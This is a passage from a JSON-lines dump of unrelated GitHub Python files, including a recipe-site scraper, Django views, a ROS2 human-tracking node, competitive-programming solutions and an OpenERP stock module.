list(ans)\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/1-500/401-500/491-递增子序列.py","file_name":"491-递增子序列.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2237658945","text":"from string import ascii_lowercase\nfrom urllib.request import Request, urlopen\nfrom pyquery import PyQuery\nimport sys\n\n\ndef send_requests(ing_categ):\n url_req_template = \"https://food.ndtv.com/ingredient/{ing_categ}/page-{page}\"\n responses = []\n for page in range(1, 6):\n url = url_req_template.format(ing_categ=ing_categ, page=page)\n try:\n req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n response = urlopen(req).read()\n responses.append(response.decode('latin-1'))\n print(\"Success request to:\", url)\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print(\"Failed request to:\", ing_categ, \"Error:\", str(e), \"Line:\", exc_tb.tb_lineno)\n return responses\n\n\ndef send_request(url):\n try:\n req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n response = urlopen(req).read()\n return response.decode('latin-1')\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print(\"Failed request to:\", url, \"Error:\", str(e), \"Line:\", exc_tb.tb_lineno)\n return None\n\n\ndef parse():\n url = \"https://food.ndtv.com/ingredient\"\n response = send_request(url)\n ingredients_category = ing_categ_parse(response)\n result = dict()\n for ing_categ in ingredients_category:\n ing = list()\n for ing_page in send_requests(ing_categ):\n try:\n pq = PyQuery(ing_page)(\".vdo_lst\")\n ing.extend([i.text().lower() for i in pq.items(\"li\") if i.text() != \"No Record Found\"])\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print(\"Failed to parse page.\", \"Error:\", str(e), \"Line:\", exc_tb.tb_lineno)\n result[ing_categ] = {\"count\":len(ing), \"ing\":ing}\n return result\n\n\ndef ing_categ_parse(response):\n pq = PyQuery(response)(\".vdo_lst\")\n ing_categ = 
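The MST solution above rescans the sorted edge list from the start after every accepted edge, which degrades to roughly O(V·E). Kruskal's algorithm with a union-find structure is the usual fix; a standalone sketch on a hard-coded graph instead of stdin.

def kruskal(num_vertices, edges):          # edges: (a, b, weight), 1-indexed
    parent = list(range(num_vertices + 1))

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving keeps trees shallow
            x = parent[x]
        return x

    total = 0
    for a, b, w in sorted(edges, key=lambda e: e[2]):
        ra, rb = find(a), find(b)
        if ra != rb:                       # edge joins two components: keep it
            parent[ra] = rb
            total += w
    return total

edges = [(1, 2, 1), (2, 3, 2), (1, 3, 3)]
assert kruskal(3, edges) == 3              # picks the weight-1 and weight-2 edges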
[i.text().lower().replace(\" \", \"-\") for i in pq.items(\"li\")]\n return ing_categ\n","repo_name":"turcunicusor/KunFooD","sub_path":"SourceCode/RecipesParser/food_ndtv_parser.py","file_name":"food_ndtv_parser.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71311785768","text":"from django.http import HttpResponse\n\n\ndef myview(request):\n\n if 'dj4e_cookie' in request.COOKIES:\n\n oldval = request.COOKIES.get('cookie')\n oldval = str(int(oldval)+1)\n resp = HttpResponse(\"view count=\"+(oldval))\n resp.set_cookie('cookie',str(oldval))\n\n else:\n oldval = 1\n resp = HttpResponse(\"view count=\"+str(oldval))\n resp.set_cookie('cookie',str(oldval))\n\n resp.set_cookie('dj4e_cookie', value='b99c61ac', max_age=10)\n return resp\n\n\n\n # if oldval :\n # resp.set_cookie('dj4e_cookie', int(oldval)+1) # No expired date = until browser close\n # else :\n # resp.set_cookie('dj4e_cookie', 42) # No expired date = until browser close\n # resp.set_cookie('dj4e_cookie', 'b99c61ac', max_age=1000) # seconds until expire\n # return resp\n\n # https://www.youtube.com/watch?v=Ye8mB6VsUHw\n\n#def sessfun(request) :\n# num_visits = request.session.get('num_visits', 0) + 1\n# request.session['num_visits'] = num_visits\n# if num_visits > 4 : del(request.session['num_visits'])\n# resp = HttpResponse('view count='+str(num_visits))\n# return resp\n\n\n# def myview(request):\n# print(request.COOKIES)\n# old_value = request.COOKIES['num_views',0]\n# return HttpResponse(\"num_views = \"+str(old_value))\n\n\n\n\n\n\n\n\n","repo_name":"Balasankar1597/Dj4e","sub_path":"hello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21877499585","text":"from itertools import groupby\nfrom operator import attrgetter, itemgetter\n\nfrom django.db.models import Count, Min, Q, Sum\nfrom django_countries.fields import Country as DjangoCountry\n\nfrom mi.models import (\n Sector,\n SectorTeam,\n Target,\n)\nfrom mi.utils import (\n get_financial_start_date,\n month_iterator,\n sort_campaigns_by,\n two_digit_float,\n)\nfrom mi.views.base_view import BaseWinMIView\nfrom wins.models import Notification\n\n\nclass BaseSectorMIView(BaseWinMIView):\n \"\"\" Abstract Base for other Sector-related MI endpoints to inherit from \"\"\"\n\n def _get_team(self, team_id):\n \"\"\" Get SectorTeam object or False if invalid ID \"\"\"\n\n try:\n return SectorTeam.objects.get(id=int(team_id))\n except SectorTeam.DoesNotExist:\n return False\n\n def _team_wins_breakdown(self, sector_team):\n \"\"\" Breakdown of team's HVC, non-HVC and non-export Wins \"\"\"\n\n return self._breakdowns(self._get_all_wins(sector_team))\n\n def _get_group_wins(self, group):\n \"\"\" HVC wins of the HVC Group \"\"\"\n return self._wins().filter(\n hvc__in=group.campaign_ids,\n ).select_related('confirmation')\n\n def _get_hvc_wins(self, team):\n \"\"\"\n HVC wins alone for the `SectorTeam`\n\n A `Win` is considered HVC for this team, when it falls under a Campaign that belongs to this `SectorTeam`\n \"\"\"\n return self._wins().filter(\n hvc__in=team.campaign_ids\n ).select_related('confirmation')\n\n def _get_non_hvc_wins(self, team):\n \"\"\"\n non-HVC wins alone for the `SectorTeam`\n\n A `Win` is a non-HVC, if no HVC was mentioned while recording it\n but it belongs to a CDMS Sector that is within this `SectorTeam`s range\n 
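send_request above attaches a browser User-Agent so sites that reject urllib's default agent still answer. An offline-friendly sketch that only builds the Request object without sending it; the URL is a placeholder.

from urllib.request import Request

req = Request("https://example.com/page-1",
              headers={"User-Agent": "Mozilla/5.0"})
# urllib stores header names capitalized, so the key is "User-agent"
print(req.get_header("User-agent"))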
\"\"\"\n return self._wins().filter(\n Q(sector__in=team.sector_ids),\n Q(hvc__isnull=True) | Q(hvc='')\n ).select_related('confirmation')\n\n def _get_all_wins(self, sector_team):\n \"\"\" Get HVC and non-HVC Wins of a Sector Team \"\"\"\n\n return (list(self._get_hvc_wins(sector_team)) +\n list(self._get_non_hvc_wins(sector_team)))\n\n def _get_avg_confirm_time(self, team):\n \"\"\"\n Average of (earliest CUSTOMER notification created date - customer response date) for given team\n \"\"\"\n\n notifications_qs = Notification.objects.filter(\n type__exact='c',\n win__sector__in=team.sector_ids,\n win__confirmation__isnull=False,\n )\n return self._average_confirm_time(notifications_qs)\n\n def _sector_result(self, team):\n \"\"\" Basic data about sector team - name & hvc's \"\"\"\n\n return {\n 'name': team.name,\n 'avg_time_to_confirm': self._get_avg_confirm_time(team),\n 'hvcs': self._hvc_overview(team.targets.all()),\n }\n\n\nclass TopNonHvcSectorCountryWinsView(BaseSectorMIView):\n \"\"\" Sector Team non-HVC Win data broken down by country \"\"\"\n\n def get(self, request, team_id):\n \"\"\"\n percentComplete is based on the top value being 100%\n averageWinValue is total non_hvc win value for the sector/total number of wins during the financial year\n averageWinPercent is therefore averageWinValue * 100/Total win value for the sector/market\n \"\"\"\n team = self._get_team(team_id)\n if not team:\n return self._invalid('team not found')\n\n records_to_retreive = 5\n\n wins = self._wins().filter(\n Q(hvc='') | Q(hvc__isnull=True),\n sector__in=team.sector_ids,\n ).values(\n 'country',\n 'sector'\n ).annotate(\n total_value=Sum('total_expected_export_value'),\n total_wins=Count('id')\n ).order_by('-total_value')[:records_to_retreive]\n\n top_value = int(wins[0]['total_value'])\n\n results = [\n {\n 'region': DjangoCountry(agg_win['country']).name,\n 'sector': Sector.objects.get(id=agg_win['sector']).name,\n 'totalValue': agg_win['total_value'],\n 'totalWins': agg_win['total_wins'],\n 'percentComplete': int(int(agg_win['total_value']) * 100 / top_value),\n 'averageWinValue': int(agg_win['total_value'] / agg_win['total_wins']),\n 'averageWinPercent': int((agg_win['total_value'] / agg_win['total_wins']) * 100 / top_value)\n }\n for agg_win in wins\n ]\n return self._success(results)\n\n\nclass AverageTimeToConfirmView(BaseWinMIView):\n \"\"\" Average number of days to confirm a Win \"\"\"\n\n average_time = 0.0\n\n def get(self, request):\n \"\"\"\n Average of (earliest CUSTOMER notification created date - customer response date)\n \"\"\"\n notifications = Notification.objects.filter(\n type__exact='c',\n win__confirmation__created__isnull=False\n ).annotate(Min('created')).select_related('win__confirmation')\n\n confirm_delay = [(notification.win.confirmation.created - notification.created).days\n for notification in notifications]\n total_days = sum(confirm_delay)\n average_time = total_days / notifications.count()\n\n results = {\n 'average': two_digit_float(average_time),\n }\n return self._success(results)\n\n\nclass SectorTeamsListView(BaseSectorMIView):\n \"\"\" Basic information about all Sector Teams \"\"\"\n\n def _get_hvc_groups_for_team(self, team):\n \"\"\" return sorted list of HVC Groups for a given Sector Team \"\"\"\n\n results = [\n {\n 'id': hvc_group.id,\n 'name': hvc_group.name,\n }\n for hvc_group in team.hvc_groups.all()\n ]\n return sorted(results, key=itemgetter('name'))\n\n def get(self, request):\n results = [\n {\n 'id': sector_team.id,\n 'name': 
sector_team.name,\n 'hvc_groups': self._get_hvc_groups_for_team(sector_team)\n }\n for sector_team in SectorTeam.objects.all()\n ]\n return self._success(sorted(results, key=itemgetter('name')))\n\n\nclass SectorTeamDetailView(BaseSectorMIView):\n \"\"\" Sector Team name, targets and win-breakdown \"\"\"\n\n def get(self, request, team_id):\n team = self._get_team(team_id)\n if not team:\n return self._invalid('team not found')\n\n results = self._sector_result(team)\n results['wins'] = self._team_wins_breakdown(team)\n return self._success(results)\n\n\nclass SectorTeamMonthsView(BaseSectorMIView):\n \"\"\" Sector Team name, hvcs and wins broken down by month \"\"\"\n\n def _month_breakdowns(self, wins):\n month_to_wins = self._group_wins_by_month(wins)\n return [\n {\n 'date': date_str,\n 'totals': self._breakdowns_cumulative(month_wins),\n }\n for date_str, month_wins in month_to_wins\n ]\n\n def _group_wins_by_month(self, wins):\n date_attrgetter = attrgetter('date')\n sorted_wins = sorted(wins, key=date_attrgetter)\n month_to_wins = []\n # group wins by date (month-year)\n for k, g in groupby(sorted_wins, key=date_attrgetter):\n month_wins = list(g)\n date_str = month_wins[0].date.strftime('%Y-%m')\n month_to_wins.append((date_str, month_wins))\n\n # Add missing months within the financial year until current month\n for item in month_iterator(get_financial_start_date()):\n date_str = '{:d}-{:02d}'.format(*item)\n existing = [m for m in month_to_wins if m[0] == date_str]\n if len(existing) == 0:\n month_to_wins.append((date_str, list()))\n\n return sorted(month_to_wins, key=lambda tup: tup[0])\n\n def get(self, request, team_id):\n team = self._get_team(team_id)\n if not team:\n return self._invalid('team not found')\n\n results = self._sector_result(team)\n wins = self._get_all_wins(team)\n results['months'] = self._month_breakdowns(wins)\n return self._success(results)\n\n\nclass SectorTeamCampaignsView(BaseSectorMIView):\n \"\"\" Sector Team Wins broken down by individual HVC \"\"\"\n\n def _campaign_breakdowns(self, team):\n\n wins = self._get_hvc_wins(team)\n targets = team.targets.all()\n campaign_to_wins = self._group_wins_by_campaign(wins, targets)\n campaigns = [\n {\n 'campaign': campaign.name.split(':')[0],\n 'campaign_id': campaign.campaign_id,\n 'totals': self._progress_breakdown(campaign_wins, campaign.target),\n }\n for campaign, campaign_wins in campaign_to_wins\n ]\n\n sorted_campaigns = sorted(campaigns, key=sort_campaigns_by, reverse=True)\n return sorted_campaigns\n\n def _group_wins_by_campaign(self, wins, targets):\n hvc_attrgetter = attrgetter('hvc')\n sorted_wins = sorted(wins, key=hvc_attrgetter)\n campaign_to_wins = []\n\n # group existing wins by campaign\n for k, g in groupby(sorted_wins, key=hvc_attrgetter):\n campaign_wins = list(g)\n campaign_to_wins.append((Target.objects.get(campaign_id=k), campaign_wins))\n\n # add remaining campaigns\n for target in targets:\n target_campaign = Target.objects.get(campaign_id=target.campaign_id)\n if not any(target_campaign in campaign_to_win for campaign_to_win in campaign_to_wins):\n campaign_to_wins.append((target_campaign, []))\n\n return campaign_to_wins\n\n def get(self, request, team_id):\n team = self._get_team(team_id)\n if not team:\n return self._invalid('team not found')\n\n results = self._sector_result(team)\n results['campaigns'] = self._campaign_breakdowns(team)\n return self._success(results)\n\n\nclass SectorTeamsOverviewView(BaseSectorMIView):\n \"\"\" Overview of HVCs, targets etc. 
for each SectorTeam \"\"\"\n\n def _sector_obj_data(self, sector_obj):\n \"\"\" Get general data from SectorTeam or HVCGroup \"\"\"\n\n targets = sector_obj.targets.all()\n hvc_wins = self._get_hvc_wins(sector_obj)\n\n hvc_export_confirmed = sum(w.total_expected_export_value for w in hvc_wins if w.confirmed)\n hvc_export_unconfirmed = sum(w.total_expected_export_value for w in hvc_wins if not w.confirmed)\n total_target = sum(t.target for t in targets)\n\n hvc_colours_count = self._colours(hvc_wins, targets)\n\n return {\n 'id': sector_obj.id,\n 'name': sector_obj.name,\n 'values': {\n 'hvc': {\n 'current': {\n 'confirmed': hvc_export_confirmed,\n 'unconfirmed': hvc_export_unconfirmed\n },\n 'target': total_target,\n 'target_percent': self._overview_target_percentage(hvc_wins, total_target),\n },\n },\n 'hvc_performance': hvc_colours_count,\n }\n\n def _sector_data(self, sector_team):\n \"\"\" Calculate overview for a sector team \"\"\"\n\n result = self._sector_obj_data(sector_team)\n\n hvc_wins = self._get_hvc_wins(sector_team)\n non_hvc_wins = self._get_non_hvc_wins(sector_team)\n non_hvc_confirmed = sum(w.total_expected_export_value for w in non_hvc_wins if w.confirmed)\n non_hvc_unconfirmed = sum(w.total_expected_export_value for w in non_hvc_wins if not w.confirmed)\n hvc_confirmed = result['values']['hvc']['current']['confirmed']\n hvc_unconfirmed = result['values']['hvc']['current']['unconfirmed']\n\n total_win_percent = self._overview_win_percentages(hvc_wins, non_hvc_wins)\n\n totals = {\n 'confirmed': hvc_confirmed + non_hvc_confirmed,\n 'unconfirmed': hvc_unconfirmed + non_hvc_unconfirmed\n }\n\n non_hvc_data = {\n 'total_win_percent': total_win_percent['non_hvc'],\n 'current': {\n 'confirmed': non_hvc_confirmed,\n 'unconfirmed': non_hvc_unconfirmed\n }\n }\n\n result['values']['totals'] = totals\n result['values']['non_hvc'] = non_hvc_data\n result['values']['hvc']['total_win_percent'] = total_win_percent['hvc']\n\n result['hvc_groups'] = [\n self._sector_obj_data(parent)\n for parent in sector_team.hvc_groups.all()\n ]\n return result\n\n def get(self, request):\n result = [self._sector_data(team) for team in SectorTeam.objects.all()]\n return self._success(sorted(result, key=lambda x: (x['name'])))\n","repo_name":"adamchainz/export-wins-backend","sub_path":"mi/views/sector_views.py","file_name":"sector_views.py","file_ext":"py","file_size_in_byte":12800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37571965647","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup\nimport sys\n\nimport pynipap\n\nlong_desc = open('README.rst').read()\nshort_desc = long_desc.split('\\n')[0].split(' - ')[1].strip()\n\nsetup(\n name = 'pynipap',\n version = pynipap.__version__,\n description = short_desc,\n long_description = long_desc,\n author = pynipap.__author__,\n author_email = pynipap.__author_email__,\n license = pynipap.__license__,\n url = pynipap.__url__,\n py_modules = ['pynipap'],\n keywords = ['nipap'],\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Topic :: Internet :: WWW/HTTP :: WSGI :: Middleware'\n 
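_group_wins_by_month in the sector views above relies on itertools.groupby, which only merges adjacent items, hence the sorted() call before grouping. A minimal demo of that sort-then-group idiom on bare dates.

from datetime import date
from itertools import groupby

wins = [date(2017, 5, 2), date(2017, 4, 9), date(2017, 5, 30)]
for month, items in groupby(sorted(wins), key=lambda d: d.strftime("%Y-%m")):
    print(month, len(list(items)))         # 2017-04 1, then 2017-05 2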
]\n)\n","repo_name":"scoffers/NIPAPP","sub_path":"pynipap/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43446648685","text":"import logging\nfrom pi import *\n\n# Setup logging config\nLOG_FORMAT = \"%(asctime)s (%(levelname)s) - %(message)s @ [%(pathname)s(%(lineno)d)]\"\nlogging.basicConfig(filename='pi.log',\n level = logging.DEBUG,\n format = LOG_FORMAT,\n filemode = 'w')\nlogging.getLogger().addHandler(logging.StreamHandler())\n\np = Pi([])\np.start()\np.run()\n","repo_name":"SCC331Penguins/Pi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5491117214","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 23 14:57:20 2021\n\n@author: pinup1\n\"\"\"\n#used for human tracking\n#tracking will be done for 1 human in the scene only\n\nimport rclpy\nfrom rclpy.node import Node\n#from geometry_msgs.msg import Twist \nfrom geometry_msgs.msg import Point \n#from pic_message.msg import XYCoordinates\n\n\nimport pyrealsense2 as rs\n \nfrom PIL import Image as PILImage\nfrom yolov4 import Detector\n\nimport numpy as np \nimport time\nimport cv2\nimport math\n\nangle1 = 15\nangle2 = 30\n\npath_darknet = \"/home/fabian/yolov4/darknet/\"\n\ncam_list = []\n\ndef testDevice(source):\n cap = cv2.VideoCapture(source)\n \n if cap is None or not cap.isOpened():\n print('Warning: unable to open video source: ', source)\n \n else:\n cam_list.append(source)\ndef get_CamID(): \n for i in range(4):\n testDevice(i)\n print(\"\\ncam list: {}\".format(cam_list))\n return cam_list[-1]\n\nprint(get_CamID())\n\ndef detect_humans(a): \n img = PILImage.fromarray(a) # using frames directly without saving \n print(type(img))\n d = Detector(config_path= path_darknet + 'cfg/yolov4-tiny.cfg', weights_path= path_darknet + 'model_data/yolov4-tiny.weights', gpu_id=1)\n img_arr = np.array(img.resize((d.network_width(), d.network_height())))\n detections = d.perform_detect(image_path_or_buf=img_arr, show_image=True)\n peoplenumber = 0\n maxconfi = 0\n humancoordinate = tuple()\n for detection in detections:\n box = detection.left_x, detection.top_y, detection.width, detection.height\n print(f'{detection.class_name.ljust(10)} | {detection.class_confidence * 100:.1f} % | {box}') \n if detection.class_name == 'person'and detection.class_confidence * 100 >= 50:\n peoplenumber += 1\n if detection.class_confidence >= maxconfi:\n centrecoordinate = (int(detection.left_x + 0.5 * detection.width), int(detection.top_y + 0.5 * detection.height))\n maxconfi = (int(detection.class_confidence*100))\n#coordinate is based on resized image\n \n if peoplenumber == 0:\n humancoordinate = None\n \n elif peoplenumber > 0 :\n maxconfi = detection.class_confidence\n humancoordinate = centrecoordinate\n \n return humancoordinate, maxconfi \n\ndef cartesiantopolar(x,z):\n radius = math.sqrt( x * x + z * z )\n theta = math.atan(x/z) #from center\n theta = 180 * theta/math.pi #get in degrees\n \n return theta, radius \n\n#def fuzzy(x,z):\ndef startstream():\n # Create a context object. 
This object owns the handles to all connected realsense devices\n pipeline = rs.pipeline()\n \n # Configure streams\n config = rs.config()\n config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 15)\n config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 15)\n #print(\"config set\")\n # Start streaming\n pipeline.start(config)\n \n #print(\"started pipe\")\n\ndef getcoordinates(self):\n# self.pipeline = rs.pipeline()\n\n\n# This call waits until a new coherent set of frames is available on a device\n # Calls to get_frame_data(...) and get_frame_timestamp(...) on a device will return stable values until wait_for_frames(...) is called\n frames = self.pipeline.wait_for_frames()\n# print(\"frames ready\")\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n if not depth_frame or not color_frame: \n print(\"error\")\n# print(color_frame)\n \n color_image = np.asanyarray(color_frame.get_data()) #change to numpy to fit detector \n \n stream_vid = color_image.copy()\n # print(\"hi\")\n \n cv2.imshow('clone_stream', stream_vid)\n \n intrin = frames.profile.as_video_stream_profile().intrinsics\n pixel, humanconfi = detect_humans(color_image) #get coordinate of human based on yolov4\n print(\"pixel: \",pixel)\n if pixel == None:\n print(\"no human\")\n self.human = False\n# human = False\n else:\n print(pixel[0],pixel[1])\n rspixel = (int(pixel[0]/608*640),int(pixel[1]/608*480))\n print(\"rspixel: \",rspixel)\n dist = depth_frame.get_distance(rspixel[0],rspixel[1])\n Point = rs.rs2_deproject_pixel_to_point(intrin, rspixel, dist)\n print(\"3D coordinate of this point is: \", Point)\n x,y,z = Point\n if z != 0:\n self.human = True\n# human = True\n self.theta, self.radius = cartesiantopolar(x,z)\n print(\"Polar coordinates: \", \"\\ntheta: \", self.theta, \"\\nradius(m): \",self.radius)\n \n k = cv2.waitKey(5) & 0xFF # Esc key to stop\n if k == 27:\n# self.exit = True\n return True\n\ndef open_video():\n cap = cv2.VideoCapture(get_CamID())\n if not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n return cap\n \n \nclass MinimalPublisher(Node):\n def __init__(self):\n super().__init__('minimal_publisher')\n self.publisher_ = self.create_publisher(Point, 'XY', 10)\n timer_period = 1 # seconds\n self.timer = self.create_timer(timer_period, self.timer_callback)\n self.counter = 0\n \n#open camera\n self.cap = open_video()\n \n #print(\"started pipe\")\n# print(\"start stream\")\n self.human = bool()\n self.exit = bool()\n self.x = float(0)\n self.y = float(0)\n \n def timer_callback(self):\n try:\n ret,frame = self.cap.read()\n if not ret:\n print(\"no image\")\n humancoordinate, maxconfi = detect_humans(frame)\n print(\"human confidence: \",maxconfi)\n if maxconfi > 0.5:\n self.human = True\n self.counter = 0\n print(humancoordinate)\n else:\n self.human = False\n self.counter += 1\n if self.human:\n self.x = float(humancoordinate[0])\n self.y = float(humancoordinate[1])\n msg = Point()\n msg.x = float(humancoordinate[0])\n msg.y = float(humancoordinate[1])\n self.publisher_.publish(msg)\n self.get_logger().info('Publishing an cmd vel '+ str(self.human))\n else:\n if self.counter > 5:\n self.get_logger().info(\"published nothing, no human\") \n else:\n msg = Point()\n msg.x = self.x\n msg.y = self.y\n self.publisher_.publish(msg)\n self.get_logger().info('Publishing an cmd vel using prev coordinates '+ str(self.human))\n except KeyboardInterrupt:\n self.cap.release()\n cv2.destroyAllWindows()\n \ndef main(args=None):\n rclpy.init(args=args)\n 
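A quick way to sanity-check the geometry above without a camera attached: the sketch below reworks the 608x608-to-640x480 pixel rescale from getcoordinates() and the cartesiantopolar() helper as standalone functions (the names here are illustrative, not part of this script), and it substitutes math.atan2(x, z) for math.atan(x/z) so a zero depth reading cannot raise ZeroDivisionError.

import math

def rescale_pixel(pixel, src=(608, 608), dst=(640, 480)):
    # Map a detection centre from the YOLO input frame to the RealSense colour frame,
    # mirroring the rspixel computation in getcoordinates().
    return (int(pixel[0] / src[0] * dst[0]), int(pixel[1] / src[1] * dst[1]))

def cartesian_to_polar(x, z):
    # Bearing from the optical axis in degrees, plus straight-line range in metres.
    theta = math.degrees(math.atan2(x, z))
    radius = math.hypot(x, z)
    return theta, radius

print(rescale_pixel((304, 304)))     # (320, 240) -- the frame centre
print(cartesian_to_polar(0.5, 2.0))  # approximately (14.04, 2.06)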
print(\"initiating pub\")\n print(\"started\")\n time.sleep(5)\n minimal_publisher = MinimalPublisher()\n rclpy.spin(minimal_publisher)\n print('spin done')\n minimal_publisher.destroy_node()\n\n rclpy.shutdown()\n print(\"shutdown\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"fabianraus83/human_following","sub_path":"human_following/XYCoordinateWithUSBCamera_Pub.py","file_name":"XYCoordinateWithUSBCamera_Pub.py","file_ext":"py","file_size_in_byte":7217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40931119292","text":"N = int(input())\nmod = 10**9+7\nA = [int(n)%mod for n in input().split()]\nS = [0 for _ in range(N)]\nS[0] = A[0]\nfor i in range(1,N):\n S[i] = (A[i]+S[i-1])%mod\n\nres = 0\nfor i in range(N):\n res += (A[i]*(S[N-1] - S[i]))%mod\n res %= mod\n\nprint(res)\n","repo_name":"Koheki/TIS","sub_path":"2022-11/2022-11-11/ABC177C.py","file_name":"ABC177C.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4359912932","text":"import openerp.addons.decimal_precision as dp\nfrom openerp.osv import fields, osv, orm\nimport logging\n_logger = logging.getLogger(__name__)\nfrom operator import itemgetter\nfrom itertools import groupby\nfrom openerp import netsvc\n\nimport requests\n\nclass stock_location(osv.osv):\n _inherit = \"stock.location\"\n\n def _product_value_ats(self, cr, uid, ids, field_names, arg, context=None):\n \"\"\"Computes stock value (real and virtual) for a product, as well as stock qty (real and virtual).\n @param field_names: Name of field\n @return: Dictionary of values\n \"\"\"\n prod_id = context and context.get('product_id', False)\n\n if not prod_id:\n return dict([(i, 0.0) for i in ids])\n\n product_product_obj = self.pool.get('product.product')\n\n cr.execute('select distinct product_id, location_id from stock_move where location_id in %s', (tuple(ids), ))\n dict1 = cr.dictfetchall()\n cr.execute('select distinct product_id, location_dest_id as location_id from stock_move where location_dest_id in %s', (tuple(ids), ))\n dict2 = cr.dictfetchall()\n res_products_by_location = sorted(dict1+dict2, key=itemgetter('location_id'))\n products_by_location = dict((k, [v['product_id'] for v in itr]) for k, itr in groupby(res_products_by_location, itemgetter('location_id')))\n\n result = dict([(i, 0.0) for i in ids])\n result.update(dict([(i, 0.0) for i in list(set([aaa['location_id'] for aaa in res_products_by_location]))]))\n\n currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id\n currency_obj = self.pool.get('res.currency')\n currency = currency_obj.browse(cr, uid, currency_id, context=context)\n\n\n for loc_id, product_ids in products_by_location.items():\n if prod_id:\n product_ids = [prod_id]\n c = (context or {}).copy()\n c['location'] = loc_id\n for prod in product_product_obj.browse(cr, uid, product_ids, context=c):\n \"\"\"\n if prod.is_kit:\n child_prod = []\n for bom in prod.bom_ids:\n for line in bom.bom_lines:\n child_prod.append(line.product_id)\n child_prod = list(set(child_prod))\n if not child_prod:\n continue\n result[loc_id] += min([p._current_virtual_available for p in child_prod])\n else:\n \"\"\"\n if loc_id not in result:\n result[loc_id] = 0\n result[loc_id] += prod._current_virtual_available\n return result\n\n\n def _product_value(self, cr, uid, ids, field_names, arg, context=None):\n \"\"\"Computes stock value (real and virtual) for 
a product, as well as stock qty (real and virtual).\n @param field_names: Name of field\n @return: Dictionary of values\n \"\"\"\n prod_id = context and context.get('product_id', False)\n\n if not prod_id:\n return dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])\n\n product_product_obj = self.pool.get('product.product')\n\n cr.execute('select distinct product_id, location_id from stock_move where location_id in %s', (tuple(ids), ))\n dict1 = cr.dictfetchall()\n cr.execute('select distinct product_id, location_dest_id as location_id from stock_move where location_dest_id in %s', (tuple(ids), ))\n dict2 = cr.dictfetchall()\n res_products_by_location = sorted(dict1+dict2, key=itemgetter('location_id'))\n products_by_location = dict((k, [v['product_id'] for v in itr]) for k, itr in groupby(res_products_by_location, itemgetter('location_id')))\n\n result = dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])\n result.update(dict([(i, {}.fromkeys(field_names, 0.0)) for i in list(set([aaa['location_id'] for aaa in res_products_by_location]))]))\n #result = super(stock_location, self)._product_value(cr, uid, ids, field_names, arg, context=context)\n\n currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id\n currency_obj = self.pool.get('res.currency')\n currency = currency_obj.browse(cr, uid, currency_id, context=context)\n for loc_id, product_ids in products_by_location.items():\n if prod_id:\n product_ids = [prod_id]\n c = (context or {}).copy()\n c['location'] = loc_id\n for prod in product_product_obj.browse(cr, uid, product_ids, context=c):\n #Issue 203\n if prod.is_kit:\n child_prod = []\n for bom in prod.bom_ids:\n #bom type is phantom\n #TODO take care of the valid date of the components\n #if bom.type == 'phantom':\n for line in bom.bom_lines:\n child_prod.append(line.product_id)\n child_prod = list(set(child_prod))\n if not child_prod:\n continue\n for f in field_names:\n if f == 'stock_real':\n if loc_id not in result:\n result[loc_id] = {}\n result[loc_id][f] += min([p.qty_available for p in child_prod])\n elif f == 'stock_virtual':\n result[loc_id][f] += prod.virtual_available\n result[loc_id][f] += min([p.virtual_available for p in child_prod])\n elif f == 'stock_real_value':\n result[loc_id][f] += min([currency_obj.round(cr, uid, currency, p.qty_available * p.standard_price) for p in child_prod])\n elif f == 'stock_virtual_value':\n result[loc_id][f] += min([currency_obj.round(cr, uid, currency, p.virtual_available * p.standard_price) for p in child_prod])\n else:\n for f in field_names:\n if f == 'stock_real':\n if loc_id not in result:\n result[loc_id] = {}\n result[loc_id][f] += prod.qty_available\n elif f == 'stock_virtual':\n result[loc_id][f] += prod.virtual_available\n elif f == 'stock_real_value':\n amount = prod.qty_available * prod.standard_price\n amount = currency_obj.round(cr, uid, currency, amount)\n result[loc_id][f] += amount\n elif f == 'stock_virtual_value':\n amount = prod.virtual_available * prod.standard_price\n amount = currency_obj.round(cr, uid, currency, amount)\n result[loc_id][f] += amount\n \n return result\n\n _columns = {\n 'stock_ats': 